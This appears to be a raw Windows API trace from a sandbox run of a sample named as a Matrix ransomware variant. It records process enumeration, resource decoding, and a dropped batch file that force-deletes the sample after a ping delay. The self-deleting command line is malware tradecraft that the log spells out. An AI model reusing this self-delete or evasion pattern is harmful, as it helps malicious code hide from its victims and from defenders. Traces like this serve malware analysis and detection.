[0093.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0093.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaac, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 0 [0093.858] CloseHandle (hObject=0xbc) returned 1 [0093.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0093.858] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0093.858] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0093.858] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0093.858] LockResource (hResData=0x5187d4) returned 0x5187d4 [0093.858] FreeResource (hResData=0x5187d4) returned 0 [0093.858] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.858] FreeResource (hResData=0x50d64c) returned 0 [0093.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13db4fc, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0093.858] GetTickCount () returned 0x22c1e [0093.858] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15064742395) returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x52\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x69\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x4b\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x57\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x78\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x4f\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x61\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x4c\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0093.858] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0093.858] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE") returned 0x25 [0093.859] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0093.859] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0093.859] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xbc [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 123 [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 123 [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x137f5a0, cbMultiByte=123, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", lpUsedDefaultChar=0x0) returned 123 [0093.859] WriteFile (in: hFile=0xbc, lpBuffer=0x137f5a0*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x137f5a0*, lpNumberOfBytesWritten=0x12fb60*=0x7b, lpOverlapped=0x0) returned 1 [0093.860] CloseHandle (hObject=0xbc) returned 1 [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xafc, dwThreadId=0xb00)) returned 1 [0093.868] CloseHandle (hObject=0xc0) returned 1 [0093.868] CloseHandle (hObject=0xbc) returned 1 [0093.868] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] WSACleanup () returned 0 [0093.968] FreeLibrary (hLibModule=0x77380000) returned 1 [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentProcess () returned 0xffffffff [0093.969] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0093.969] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.970] ResetEvent (hEvent=0x88) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] ResetEvent (hEvent=0x88) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] CloseHandle (hObject=0x88) returned 1 [0093.970] CloseHandle (hObject=0x8c) returned 1 [0093.970] CloseHandle (hObject=0x84) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x3ae)) [0093.970] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 